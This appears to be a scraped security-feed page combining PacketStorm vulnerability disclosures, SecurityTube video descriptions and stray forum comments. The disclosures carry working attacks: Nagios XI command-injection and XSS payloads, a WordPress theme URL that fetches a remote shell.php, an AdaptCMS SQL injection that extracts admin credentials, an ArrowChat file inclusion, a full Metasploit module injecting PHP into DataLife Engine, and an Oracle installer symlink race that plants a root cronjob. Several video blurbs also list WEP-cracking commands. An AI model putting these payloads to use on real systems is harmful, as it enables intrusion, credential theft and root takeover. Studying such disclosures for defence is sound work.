Praetorian503

Nagios XI version 2012R1.5b suffers from cross site request forgery, cross site scripting, remote command injection, and remote SQL injection vulnerabilities. Reflected XSS: Alert Cloud Component: Example URL: http://nagiosxiserver/nagiosxi/includes/components/alertcloud/index.php?width=800"}}; alert('xss'); var aa={"a" : {"b" : " The vulnerable code in Alert Cloud's index.php appears to have been copied and pasted into several other components as well. Escalation Wizard: Example URL: http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?stage=4&config_name=ffffff' style='height:5000px;width:5000px;position:absolute;left:-1px;top:-1px' onmouseover='alert("xss")'/> Stored XSS: Nagios QL (aka Legacy Nagios Core Configuration Manager): Example: Using ');alert('xss as the config name of a host escalation entry will result in the javascript being executed when a user tries to delete that host escalation entry. I believe that the Legacy Nagios Core Configuration Manager and the (regular, non legacy) Core Configuration Manager share configuration settings in a database. I was unable to test whether script injected via Nagios QL could be executed by using the (regular) Core Configuration Manager because the (regular) Core Configuration Manager appears to be broken in this release (?). Command Execution: Autodiscovery does not filter input properly. Any user can submit new jobs, even regular user accounts with read only access. Autodiscovery may not appear in the menu for some users, it may be necessary to browse directly to the autodiscovery page. Example (as the scan target): \; cat /etc/passwd \; Then look at the job results. Due to what seems to be (as far as I can tell) a very poorly thought out sudo rule, a user could upload a custom nmap script to the server and run it (through sudo) for easy root access. Yes, there is a sudo rule that allows apache to run nmap as root. Autodiscovery requires manual activation before it can be used (and this vulnerability exploited). Autodiscovery does use a nonce, but this can be bypassed with XSS. Not sure what to call this, content spoofing maybe? Whatever you would call it, this could be used for phishing (or whatever). Nagios XI Admin Panel: http://172.16.4.51/nagiosxi/admin/?xiwindow=http://w3c.org SQL Injection: Sorry about the poor examples below, they should be enough to demonstrate the point though. NagiosQL (aka Legacy Nagios Core Configuration Manager): Example URL: http://nagiosxiserver/nagiosql/admin/commandline.php?cname=a'+or+'a'='a Vulnerable Code: if (isset($_GET['cname']) && ($_GET['cname'] != "")) { $strResult = $myDBClass->getFieldData("SELECT command_line FROM tbl_command WHERE id='".$_GET['cname']."'"); There are other pages in NagiosQL that are also vulnerable. Escalation Wizard: Example URL: http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?stage=5&submitted=true&level=' CSRF: NagiosQL (aka Legacy Nagios Core Configuration Manager) Escalation Wizard Configuration File Injection: Example URL: http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?config_name=CoolConfigDD&contacts[]=1&contactgroups[]=1&timeperiod=2&first=1&last=10&interval=1&done=false&stage=5&level=1&objecttype=host&submitted=true&options[]=d%0A}%0Adefine host%0A%23 The 'options' GET parameter is limited to 20 characters (VARCHAR 20 in the DB) and is placed in the 'escalation_options' field in the hostescalations.cfg file. I'm not sure if it is possible to do anything useful with only 20 characters, but I find it interesting none the less. The above example creates an empty host definition that doesn't mess up the config file. If an invalid configuration file is created, the last know good configuration is rolled back and nagios is restarted, so this cannot be used for denial of service. James Clawson Source: PacketStorm

The WordPress Flash News theme suffers from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities. Change Mirror Download Hello list! I want to warn you about multiple vulnerabilities in Flash News theme for WordPress. This is commercial theme for WP from WooThemes. These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload and Information Leakage vulnerabilities. In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of Functionality and Denial of Service vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary File Uploading vulnerability. After previous advisory, I've wrote another one about multiple themes from WooThemes (http://websecurity.com.ua/5071/) with Information Leakage and Cross-Site Scripting vulnerabilities (only part of their themes were affected). If two years ago I've wrote about holes in TimThumb and multiples themes from WooThemes (where I mentioned Flash News), then this time I wrote directly about this particular theme. And also I've added other holes in it. This is example for Flash News theme. In other themes from WooThemes the situation is similar. In above-mentioned advisory I've listed 89 vulnerable themes for WP from WooThemes. ------------------------- Affected products: ------------------------- Vulnerable are all versions of Flash News theme for WordPress (in last versions there were fixed only vulnerabilities in thumb.php). I've informed developers about these vulnerabilities already in beginning of 2011 (as about holes in TimThumb, as about holes in their native scripts in their themes - for WordPress and other engines). After two years since I've informed WooThemes developers, there are hundreds thousands of sites with only Flash News theme (not mentioning all other themes), according to Google, and all of them are still vulnerable to many of these vulnerabilities. Mostly were fixed holes in thumb.php, but not in other vulnerable scripts of the theme, and there are many sites which have fixed only part of the holes in TimThumb in the theme. E.g. they fixed Code Execution (AFU), AoF and DoS holes, but XSS and FPD holes were left. ---------- Details: ---------- XSS (WASC-08): http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/flashnews/thumb.php?src=1 http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Arbitrary File Upload (WASC-31) (in not fixed versions of TimThumb): http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php Full path disclosure (WASC-13): http://site/wp-content/themes/flashnews/ Besides index.php there are also potentially FPD in other php-files of this theme. Information Leakage (WASC-13): http://site/wp-content/themes/flashnews/includes/test.php Script with phpinfo. XSS (WASC-08): http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E This XSS works in PHP < 4.4.1, 4.4.3-4.4.6 (where was possible to conduct XSS via phpinfo). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: PacketStorm

Ai si uCoz. Dar tot wordpress prefer.

Description: In this video I will show you how to exploit two machines and sniffing the traffic from the victim machine. There is one machine available with different subnet mask I will add route and exploiting it and using meterpreter sniffer module for network traffic sniffing. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Pivoting + Sniffing Network Traffic

Description: In this video I will show you how to use Railgun for post – exploitation. In this demo I will use railgun for Message Box and Process Terminate. This demo performed by David Maloney at defcon-20 Weaponizing The Windows Api With Metasploit’S Railgun Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post - Exploitation Using Metasploit Railgun

Description: The Executable and Linkable Format (ELF) is omnipresent; related OS and library code is run whenever processes are set up and serviced (e.g., dynamically linked). The loader is the stage manager for every executable. Hardly anyone appreciates the work that the ELF backstage crew (including the linker and the loader) puts in to make an executable run smoothly. While the rest of the world focuses on the star, hackers such as the Grugq (in Cheating the ELF) and Skape (in Locreate: An Anagram for Relocate), and the ERESI/ELFsh crew, know to schmooze with the backstage crew. We can make a star out of the loader by tricking it into performing any computation by presenting it with crafted but otherwise well-formed ELF metadata. We will provide you with a new reason why you should appreciate the power of the ELF linker/loader by demonstrating how specially crafted ELF relocation and symbol table entries can act as instructions to coerce the linker/loader into performing arbitrary computation. We will present a proof-of-concept method of constructing ELF metadata to implement the Turing-complete Brainfuck language primitives and well as demonstrate a method of crafting relocation entries to insert a backdoor into an executable. Rebecca "bx" Shapiro is a graduate student at a small college in Northern Appalachia. She enjoys tinkering with systems in undocumented manners to find hidden sources of computation. She hopes to continue this work to find more specimens for Sergey Bratus's weird machine zoo. Twitter: @bxsays Sergey Bratus is a Northern Appalachian who hacks DWARF and ELF. It is his ambition to collect and classify all kinds of weird machines; he is also a member of the Language-theoretic Security conspiracy to eliminate large classes of bugs. Twitter: @sergeybratus Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Programming Weird Machines With Elf Metadata

Description: OpenDLP is a free and open source agent-based data discovery tool that works against Microsoft Windows systems using appropriate authentication credentials. However, one drawback to OpenDLP is that its policy-driven approach makes it arduous to scan disjointed systems that are not part of a Windows domain or do not share the same authentication credentials. To fix this, OpenDLP can now launch its agents over Meterpreter sessions using Metasploit RPC without requiring domain credentials. Andrew Gavin, creator of OpenDLP, is an information security consultant at Verizon Business. He has more than 12 years of experience in security assessments of networks and applications. He has consulted for numerous customers in various industries around the world. Twitter: @OpenDLP (project), @andrewgavin (personal) Michael Baucom is the VP of Engineering at N2 Net Security. Michael has taught classes on exploit development and was the technical editor for Gray Hat Hacking: the Ethical Hacker's Handbook. He has worked in development for over 15 years in various industries. While at N2 Net Security he has worked on a wide variety of projects including software security assessments, tool development, and penetration tests. Charles Smith is a graduate of North Carolina State University, and has been building credit card software and developer tools and modules for the last ten years. Recently he has joined N2 Net Security, and has put his skills to ferreting out security vulnerabilities and building new tools to help penetration testers do their jobs more efficiently. He specializes in C++, but is also well-versed in Java, .NET, VB, and Perl. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post-Exploitation Nirvana: Launching Opendlp Agents Over Meterpreter Sessions

Description: Recognizing a need to support passive bluetooth monitoring in Scapy, Python's interactive monitoring framework, a project was launched to produce this functionality. Through this functionality, a new means for interactively observing bluetooth was created along with Python APIs to assist in the development of bluetooth auditing, pentesting and exploitation tools. The project supplements the work of Michael Ossman et al by providing Python extensions and Scapy modules which interact with an Ubertooth dongle. The project also provides support for other passive bluetooth techniques not present in the current Ubertooth core software such as NAP identification, vendor lookup, extended logging and more. In conjunction with this presentation, the source for this project will be released along with distribution packages for easy installation. Ryan Holeman resides in Austin Texas where he works as a software developer specializing in backend services. He has a Masters of Science in Software Engineering and has published papers though ICSM and ICPC. His spare time is mostly spent digging into various network protocols and shredding local skateparks. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Passive Bluetooth Monitoring In Scapy

www.youtube.com/watch?v=W3AfKOvwSNw Description: In this video I will show you how to crack WEP key using aircrack-ng suite. Attack method is arpreplay. Steps : - 1 - Start Monitor Mode 2 - Start writing data using airodump-ng 3 - use aireplay-ng for arpreplay 4 - if you don't get packets perform a deauth attack. ------ 1 - airmon-ng start wlan0 2 - airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write (Name) mon0 3 - aireplay-ng --arpreplay -e XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX mon0 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Cracking Wep Encryption Manually

Description: In this video I will show you how to use hwk wireless exploitation tool. This tool is powerd by nullsecurity.net and developed by atzeton. In this demo I will cover some interesting features like become flood, Fuzzing, Deauth etc. hwk is an easy-to-use wireless authentication and deauthentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. nullsecurity Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hwk Wireless Exploitation Tool

AdaptCMS versions 2.0.4 and below suffer from a remote SQL injection vulnerability. # Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability # Date: 26/10/2012 # Exploit Author: Kallimero # Vendor Homepage: http://www.adaptcms.com/ # Software Link: http://www.insanevisions.com/page/3/Downloads/ # Version: 2.0.4 # Tested on: Debian Introduction ============ As you know, I love fun and tricky SQL injections. AdaptCMS is vulnerable to a really unusual one. The vuln ======== First let's see the code : ---------------[config.php]--------------- Line 34 : array_map('clean', $_POST); ---------------[config.php]--------------- clean() acts like addslashes. But a couple of lines after: ---------------[config.php]--------------- ligne 111: mysql_query("INSERT INTO ".$pre."polls VALUES (null, '".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '', '".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')"); ---------------[config.php]--------------- w00t an SQL injection. $_POST['question'] is urldecoded after the superglobal's clean. That's why we can easily inject our SQL request. (Without ENT_QUOTES, the simple quote pass through htmlentities() ). The PoC : ========= Ok, now we have to add a second INSERT query, to insert a custom choice in the poll, which obviously contain the admin creditentials. A simple POST http request such as: article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648 )-- - Now check homepage, and enjoy the admin creditentials. How to Fix ? ============ There is many SQL injections in this CMS ($_SERVER vars are vulnerables as well), and others funkies vulnz. changing your cms seems appropriate until they fix thoses issues. Thanks ========= All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. Please visit : http://www.orgasm.re/ Source: PacketStorm

ArrowChat versions 1.5.61 and below suffer from cross site scripting and local file inclusion vulnerabilities. # Exploit Title: ArrowChat <=~ 1.5.61 Multiple vulnerabilities # Date: 01/01/2013 # Exploit Author: Kallimero # Vendor Homepage: http://www.sitexcms.org/ # Version: 1.5.61, before, and maybe 1.6 # Tested on: Debian Introduction ============ ArrowChat is a chat script, which is able to be integrate in various CMS, as wordpress, or some bulletin boards. Vulnz ======== 1- ) Local File Inclusion external.php let us load langage, but not a secure way. ---------------[external.php]--------------- // Load another language if lang GET value is set and exists if (var_check('lang')) { $lang = get_var('lang'); if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php")) { include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php"); } } ---------------[index.php]--------------- Thanks to the nullbyte tricks we'll be able to include any php file, like that : http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs 2- ) reflected XSS The administration layout is accessible for anyone. Even if we can't exec the php code of the admin, we can inject html thanks to $_SERVER['PHP_SELF'] Example : -------[admin/layout/pages_general.php]----- <form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php echo $do; ?>" enctype="multipart/form-data"> ---------------------------------- PoC: http:// [site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script> How to Fix ? ============ To fix the LFI, you can replace it with : // Load another language if lang GET value is set and exists if (var_check('lang')) { $lang = get_var('lang'); if(preg_match("#^[a-z]{2,5}$#i", $lang)){ if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php")) { include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php"); } } } lang will be include only if it's a valid lang file. For the XSS's, you can use a .htaccess to protect the layout directory, and use htmlentities to avoid the html inj'. Thanks ========= All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. Please visit : http://www.orgasm.re/ Source: PacketStorm

Description: Welcome to Part 5 of the Aircrack-ng Megaprimer series! In this video, I will be discussing the tool, airbase-ng, which is used for client-side attacks as opposed to AP attacks seen thus far. If you have any questions, comments or suggestions, please feel free to leave them in the comment section below! Thanks! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 5: Airbase-Ng

Description: Man in the middle attacks are still one of the most powerful techniques for owning machines. In this talk MITM schemas in anonymous services are going to be discussed. Then attendees will see how easily a botnet using javascript can be created to analyze that kind of connections and some of the actions people behind those services are doing... in real. It promises to be funny. Chema Alonso is a Security researcher with Informatica64, a Madrid-based security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politècnica de Madrid. During his more than eight years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Yahoo! Security Week, Black Hat Briefings, ShmooCON, DeepSec, HackCON, Ekoparty and RootedCon - He is a frequent contributor on several technical magazines in Spain, where he is involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA. Twitter: @chemaalonso Un informático en el lado del mal Informática 64 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Owning Bad Guys {And Mafia} With Javascript Botnets

Description: Their systems were fully patched, their security team watching, and the amateur pentesters just delivered their "compliant" report. They thought their Windows domain was secure. They thought wrong. Zack Fasel (played by none other than Angelina Jolie) brings a New Tool along with New methods to obtain Windows Integrated Authentication network requests and perform NTLM relaying both internally and externally. The Goal? Start off as a nobody and get domain admin (or sensitive data/access) in 60 seconds or less on a fully patched and typically secured windows environment. The Grand Finale? Zack demonstrates the ability to *externally* gain access to a Windows domain user's exchange account simply by sending them an email along with tips on how to prevent yourself from these attacks. In just one click of a link, one view of an email, or one wrong web request, this new toolset steals the identity of targeted users and leverages their access. Call your domain admins, hide your road warriors, and warn your internal users. Zack will change the way you think about Windows Active Directory Security and trust relationships driving you to further harden your systems and help you sleep at night. Owned in 60 Seconds. Coming This Summer. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Owned In 60 Seconds: From Network Guest To Windows Domain Admin

Description: Before they were a team, the members of project SPAN thought it was highly limiting to only be able to network smart phones over standard Wi-Fi or with a Cellular infrastructure. Honestly, the SPAN team isn't a big fan of infrastructure-based networks in general. They wanted a headless, dynamic network that allowed for resilient communications when the other infrastructure either wasn't available or when they just didn't feel like using it. They also really liked the idea of a communication system where there was no central router, server or other central point of sniffing of data. With this in mind, they teamed up and created project SPAN (Smart Phone AdHoc Networks). They decided to open source the project and to share not only the code (initial release to coincide with the presentation) but also the whole process and idea with the community at large. The team is annoyed that the current generation smart phone radios have the intrinsic ability to communicate directly with one another, but hardware vendors and mobile OS frameworks don't make it easy to do so. Let us show you how it can be done and the fun that can be had from it. Join the SPAN team for a deep dive into the Android network stack implementation and its limitations, an analysis of the Wi-Fi chipsets in the current generation of smart phones and a collection of lessons learned when writing your own network routing protocol (or 5 of them). The team will also share a "How To" walkthrough into implementing your own Mesh network and incorporating general "Off Grid" concepts into your next project; this will include securing your mesh from outside parties while tunneling and bridging through the internet. The team will delve into specific Android limitations of Ad-Hoc networking and provide workarounds and bypass mechanisms. Lastly, the team will give an overview of the implementations and network surfaces provided by the new collection of networking alternatives, including NFC and Wi-Fi Direct. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Off-Grid Communications With Android: Meshing The Mobile World

Description: This presentation describes a new technique for abusing the DWARF exception handling architecture used by the GCC tool chain. This technique can be used to exploit vulnerabilities in programs compiled with or linked to exception-enabled parts. Exception handling information is stored in bytecode format, executed by a virtual machine during the course of exception unwinding and handling. We show how a malicious attacker could gain control of those structures and inject bytecode for malicious purposes. This virtual machine is actually Turing-complete, which means that it can be made to run arbitrary attacker logic. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Overwriting The Exception Handling Cache Pointerdwarf Oriented Programming

LOIC-ul si hackerii de carton s-au gasit sa floodeze RST-ul Ceva gen anonymous caracal

Description: Hooking is the act of redirecting program control flow somewhere other than it would go by default. For instance code can be "inlined hooked" by rewriting instructions to unconditionally transfer to other code. Or code can be hooked by manipulating control flow data like function pointers (IAT, IDT, SSDT, return addresses on the stack, callback addresses in dynamically allocated objects, etc). Hooking as a technique is neutral, but it is often used by malicious software to monitor or hide information on a system. Memory integrity verification requires the ability to detect unexpected hooks which could be causing software to lie or be blinded to the true state of the system. But we don't want to make the same mistake that most security software makes, assuming that they can rely on some built in access control to keep malice at arms length. The history of exploits is the history of bypassing access control. We want to have a technique which can detect if we ourselves are being manipulated to lie even when the attacker is assumed to be at the same high privilege level as our software. We believe that such a goal can be achieved with the help of an academic technique known as software-based, or timing-based, remote attestation. This is a technique which does not require a hardware root of trust like a TPM in order to bootstrap an ephemeral dynamic root of trust for measurement. It does this by computing a randomized checksum over its own memory and other system state, to detect code or control flow integrity attacks. The self-checking software can still be forced to lie and report an unmodified system, but thanks to a special looping construction, code which causes it to lie will require extra instructions per loop. The extra instructions will be multiplied by the number of loops, causing a macroscopic, remotely-detectable, increase in the runtime vs. what's expected. So basically, an attacker can force our software to lie, but because there's a timing side-channel built into the computation, he can still be caught by taking too long to generate a convincing lie. We have independently implemented and confirmed the claims of past work, and furthermore showed that the timing discrepancy in the presence of a checksum-forging attacker is detectable not just for machines on the same ethernet segment, but over 10 links of our production LAN. Because of the results of other work in timing side-channel detection over internet-scale distances, we think this technique can be extended even further. But for now for longer distances, we use this same timing-based technique in concert with TPM as a trustworthy timer, so that network jitter is not an issue. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: No More Hooks: Detection Of Code Integrity Attacks

Description: Description: Welcome back to the Aircrack-ng Megaprimer Part 4! In this video, I will discuss the tool for which the suite is named, aircrack-ng. I will cover the following topics: WPA cracking WEP cracking Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: http://www.securitytube.net/video/6813

Description: In this video I will show you how to Dump Data from the Victim machine after exploitation. Most of 30 to 40% people save their sensitive information on the computer without any encryption. So let’s see if that pc compromised so you can dump the data using file type. Very easy to dump files dll, photos etc.. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post -- Exploitation Dump Data From The Victim Machine

Description: In this video I will show you how to use dnsspider and dnsgoblin tool. These both tools are powered by Nullsecurity.net. Dnsspider : - A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation. Dnsgoblin : - Nasty creature constantly searching for DNS servers. It uses standard dns querys and waits for the replies nullsecurity Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Dnsspider -- Dnsgoblin Tools Usage

Cateva surse adunate de ici de colo, putine cunostiinte = asta

This Metasploit module exploits a PHP code injection vulnerability DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() with the e modifier, which allows to inject arbitrary php code, when the template in use contains a [catlist] or [not-catlist] tag. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'DataLife Engine preview.php PHP Code Injection', 'Description' => %q{ This module exploits a PHP code injection vulnerability DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() with the e modifier, which allows to inject arbitrary php code, when the template in use contains a [catlist] or [not-catlist] tag. }, 'Author' => [ 'EgiX', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-1412' ], [ 'BID', '57603' ], [ 'EDB', '24438' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ], [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'Keys' => ['php'] }, 'DisclosureDate' => 'Jan 28 2013', 'Targets' => [ ['DataLife Engine 9.7', { }], ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) ], self.class) end def base base = normalize_uri(target_uri.path) base << '/' if base[-1, 1] != '/' return base end def check fingerprint = rand_text_alpha(4+rand(4)) res = send_request_cgi( { 'uri' => "#{base}engine/preview.php", 'method' => 'POST', 'vars_post' => { 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//" } }) if res and res.code == 200 and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") res = send_request_cgi( { 'uri' => "#{base}engine/preview.php", 'method' => 'POST', 'vars_post' => { 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//" } }) end end Source: PacketStorm

Oracle Automated Service Manager version 1.3 suffers from a local root privilege escalation vulnerability during install. Oracle Automated Service Manager 1.3 local root during install Larry W. Cashdollar 1/29/2013 @_larry0 SUNWsasm-1.3.1-20110815093723 https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534 From the README: "Oracle Automated Service Manager 1.3.1 Oracle Automated Service Manager is the service management container for Auto Service Request and Secure File Transport. It provides platform services (such as logging, data transport and persistence) to business services that are deployed to it." Possible issues with files in /tmp. root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp ##Read the contents of crontab into a tmp file /usr/bin/crontab -l > /tmp/crontab_edit echo "0" > /tmp/tmpVariable grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit | echo "1" > /tmp/tmpVariable grep "0" /tmp/tmpVariable > /dev/null echo >> /tmp/crontab_edit echo "##Cronjob entry for ASR Auto Rules Update" >> /tmp/crontab_edit echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >> /tmp/crontab_edit ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit` sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Status Report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit` sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit /usr/bin/crontab /tmp/crontab_edit ## Finally remove the tmp file rm -f /tmp/tmpVariable rm -f /tmp/crontab_edit tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'` /usr/bin/crontab -l > /tmp/asrtab.?? UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??` sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??` sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? /usr/bin/crontab /tmp/asrtab.?? rm /tmp/asrtab.?? ]!tmpD root@dev-unix-sec01:~/test# First try, File overwriting vulnerability $ ln -s /etc/shadow /tmp/mytab-tmp.?? $ ln -s /etc/shadow /tmp/mytab.?? [root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm Preparing... ########################################### [100%] Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved. License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use) 1:SUNWsasm ########################################### [100%] Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration. Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration. [root@oracle-lnx-lab02 ~]# cat /etc/shadow 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1 Ok, lets try to inject a cronjob and get root: Malicious user does: [meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo "* * * * * /tmp/rootme" > /tmp/mytab.??; done [root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm Preparing... ########################################### [100%] Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved. License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use) 1:SUNWsasm 